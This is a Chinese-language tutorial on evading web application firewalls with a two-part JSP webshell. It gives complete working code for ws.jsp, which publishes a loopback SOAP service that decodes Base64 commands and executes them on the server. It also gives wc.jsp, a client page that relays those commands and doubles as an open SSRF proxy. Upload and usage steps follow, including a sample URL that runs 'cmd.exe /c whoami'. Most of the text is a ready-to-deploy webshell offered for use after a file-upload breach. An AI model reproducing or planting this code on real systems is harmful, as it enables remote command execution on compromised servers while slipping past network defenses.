WebService版Webshell绕过WAF思路


在利用文件上传等漏洞时,攻击行为往往是在通信过程中被 WAF 标记出来的:请求里直接出现的命令关键字(如 `whoami`)暴露了意图。一个绕过思路是先在目标上起一个只监听 127.0.0.1 的 WebService,再通过另一个页面调用这个本地服务来执行命令。这样外部流量里只剩一个 URL 和一段 Base64,命令本身只在回环接口上传输,网络层 WAF 看不到。但要注意,这并不能躲过主机侧的监控——命令仍然是由应用服务器进程通过 `Runtime.exec`/`cmd.exe` 派生出来的,EDR、进程审计或 RASP 依然能看到这一行为。

<%@ page language="java" contentType="text/html; charset=UTF-8"

pageEncoding="UTF-8"%>

<%@ page
import="java.io.*,java.nio.charset.StandardCharsets,java.util.Base64,javax.jws.WebMethod,javax.jws.WebService,javax.script.ScriptEngineManager,javax.xml.ws.Endpoint"%>

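<%!
/**
 * JAX-WS service that runs an arbitrary command on the host.
 *
 * It is declared inside the JSP, so it becomes a member class of the
 * generated servlet; the endpoint is published by the scriptlet below.
 */
@WebService
public class Hello {

    /**
     * Decodes a base64 command line, runs it and returns its console output.
     *
     * @param name base64-encoded command line; it is split on single spaces
     *             into argv (kept from the original), so arguments that contain
     *             spaces are not supported
     * @return stdout and stderr of the process, lines concatenated with no
     *         separator; "" when no command was supplied
     * @throws Exception if decoding, starting or reading the process fails
     */
    @WebMethod
    public String hello(String name) throws Exception {
        // A missing <arg0> arrives as null; treat it as "nothing to run"
        // instead of failing inside Base64/exec.
        if (name == null || name.isEmpty()) {
            return "";
        }
        // Explicit charset so the decoded command does not depend on the
        // server's file.encoding.
        String commandLine = new String(Base64.getDecoder().decode(name), StandardCharsets.UTF_8);
        ProcessBuilder pb = new ProcessBuilder(commandLine.split(" "));
        // Merge stderr into stdout: the original discarded stderr (a failing
        // command returned nothing) and never drained it, which can block the
        // child once its stderr pipe buffer fills.
        pb.redirectErrorStream(true);
        Process process = pb.start();
        StringBuilder sb = new StringBuilder();
        // Platform default charset on purpose: console output comes in the
        // host's native encoding (typically not UTF-8 on a Windows target).
        try (BufferedReader br = new BufferedReader(new InputStreamReader(process.getInputStream()))) {
            String line;
            while ((line = br.readLine()) != null) {
                sb.append(line);
            }
        } finally {
            // Reap the child so it does not linger as a zombie.
            process.waitFor();
        }
        return sb.toString();
    }
}%>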

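<%
// Publish the Hello service on the loopback HTTP endpoint, once per webapp.
// The address is "localhost", so the service is only reachable from the host
// itself. Endpoint.publish() runs on every request to this page; a second
// call for the same address normally fails because the port/context is already
// in use, so the Endpoint is cached in application scope and reused instead.
Endpoint endpoint = (Endpoint) application.getAttribute("ws.endpoint");
if (endpoint == null || !endpoint.isPublished()) {
    endpoint = Endpoint.publish("http://localhost:8081/aaa", new Hello());
    application.setAttribute("ws.endpoint", endpoint);
}
%>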

将上面的代码保存为 ws.jsp,上传后访问一次该页面,目标上就会在 127.0.0.1:8081/aaa 发布 WebService 服务。注意两点:其一,这段代码每次被访问都会再次执行 `Endpoint.publish`,第二次访问通常会因为 8081 端口/`/aaa` 路径已被占用而抛出异常,但这不影响第一次已经发布的服务;其二,`javax.xml.ws`(JAX-WS)从 JDK 11 起已不再随 JDK 提供,目标需要运行在 JDK 8 或自带 JAX-WS 依赖的应用上。

<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>

<%@ page import="java.io.*,java.net.*,java.util.regex.*" %>

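<%
// Forwards a command to the local JAX-WS endpoint published by ws.jsp and
// prints whatever comes back inside <return>...</return>.
//
//   c  - full URL of the endpoint, e.g. http://127.0.0.1:8081/aaa. It is used
//        exactly as given with no allow-list, so this page is also an
//        unauthenticated proxy that will POST to any URL the caller names.
//   cc - base64-encoded command line, passed through as the <arg0> value.
//        It is pasted into the SOAP body unescaped, so it must not contain
//        XML metacharacters (plain base64 never does).
String target = request.getParameter("c");
String payload = request.getParameter("cc");
if (target == null || payload == null) {
    // Nothing to do; the original would have died on new URL(null).
    return;
}

String envelope = String.format(
    "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:jsp=\"http://jsp.apache.org/\"><soapenv:Header/><soapenv:Body><jsp:hello><arg0>%s</arg0></jsp:hello></soapenv:Body></soapenv:Envelope>",
    payload);

HttpURLConnection conn = (HttpURLConnection) new URL(target).openConnection();
conn.setDoOutput(true);
conn.setDoInput(true);
conn.setRequestMethod("POST");
conn.setRequestProperty("Content-Type", "text/xml;charset=UTF-8");
conn.connect();

StringBuilder sb = new StringBuilder();
try {
    try (OutputStreamWriter osw = new OutputStreamWriter(conn.getOutputStream(), "UTF-8")) {
        osw.append(envelope);
        osw.flush();
    }
    // A SOAP fault comes back as HTTP 500; getInputStream() would throw and
    // the JSP would end in a stack trace, so read the error body instead
    // (it carries no <return>, which simply leaves the page output empty).
    InputStream body = conn.getResponseCode() >= 400 ? conn.getErrorStream() : conn.getInputStream();
    if (body != null) {
        try (BufferedReader br = new BufferedReader(new InputStreamReader(body, "UTF-8"))) {
            String line;
            while ((line = br.readLine()) != null) {
                sb.append(line);
            }
        }
    }
} finally {
    conn.disconnect();
}

// Non-greedy match so each <return> element is printed on its own line.
Matcher m = Pattern.compile("<return>(.*?)</return>").matcher(sb.toString());
while (m.find()) {
    out.println(m.group(1));
}
%>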

再将上面的代码保存为 wc.jsp 作为客户端。其中参数 `c` 是要调用的 WebService 地址,`cc` 是 Base64 编码后的命令行(示例中的 `Y21kLmV4ZSAvYyB3aG9hbWk=` 解码后即 `cmd.exe /c whoami`)。访问

http://localhost:8080/wc.jsp?c=http://127.0.0.1:8081/aaa&cc=Y21kLmV4ZSAvYyB3aG9hbWk=

即可成功执行命令,并在页面上看到 `<return>` 里的输出。两点补充:wc.jsp 对 `c` 参数没有任何校验,它本身就是一个可以指向任意地址的 SSRF 代理,上传后同样会暴露给其他人;SOAP 报文里的命名空间 `http://jsp.apache.org/` 来自 Tomcat/Jasper 把 JSP 编译到 `org.apache.jsp` 包的约定,换用其他容器时 JAX-WS 推导出的命名空间可能不同,需要按目标实际生成的 WSDL 调整。
